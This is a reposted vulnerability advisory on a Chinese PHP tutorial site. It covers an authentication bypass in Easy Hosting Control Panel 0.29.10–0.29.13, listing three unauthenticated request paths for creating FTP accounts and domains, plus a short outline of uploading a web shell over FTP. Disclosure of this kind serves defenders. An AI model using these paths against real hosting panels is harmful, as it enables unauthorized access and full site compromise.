网站地图    收藏   

主页 > 后端 > 网站安全 >

Easy Hosting控制面板管理验证绕过缺陷及修复 - 网

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 标题: Easy Hosting Control Panel Admin Auth Bypass作者: Jasman www.2cto.com下载地址: https://launchpad.net/ehcp http://www.ehcp.net影响版本: 0.29.10 - 0.29.13测试平台: Ubuntu, D......

 

标题: Easy Hosting Control Panel Admin Auth Bypass

作者: Jasman www.2cto.com

下载地址: https://launchpad.net/ehcp & http://www.ehcp.net

影响版本: 0.29.10 - 0.29.13

测试平台: Ubuntu, Debian

 

概述

Easy Hosting Control Panel designed for hosting of multiple domains on single machine.

It uses LAMP(LinuxApacheMysqlPhp). Its aim:easily installable,easy usage, non-complex,functional

 

缺陷:

无需登录可以添加ftp账号和域名

 

 

http://www.2cto.com /vhosts/ehcp/?op=applyforaccount

http://www.2cto.com /vhosts/ehcp/?op=applyforftpaccount

http://www.2cto.com /vhosts/ehcp/?op=applyfordomainaccount

 

示例

upload a shell via ftp

http://www.2cto.com /vhosts/[username]/[domain]/httpdocs/shell.php

 

测试版本

0.29.13

0.29.11

0.29.10

修复:验证

 

 致谢:

ArRay,`yuda, N4ck0, K4pt3N, samu1241, bejamz, Gameover, antitos, yuki, pokeng,

aphe_aphe, jos_ali_joe, BlueBoyz, JFry_, Ihsana'Lab, Anaski Crew, Forum.ExploreCrew

Exploit-Id, FeeLcoMz All Indonesian Hacker

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论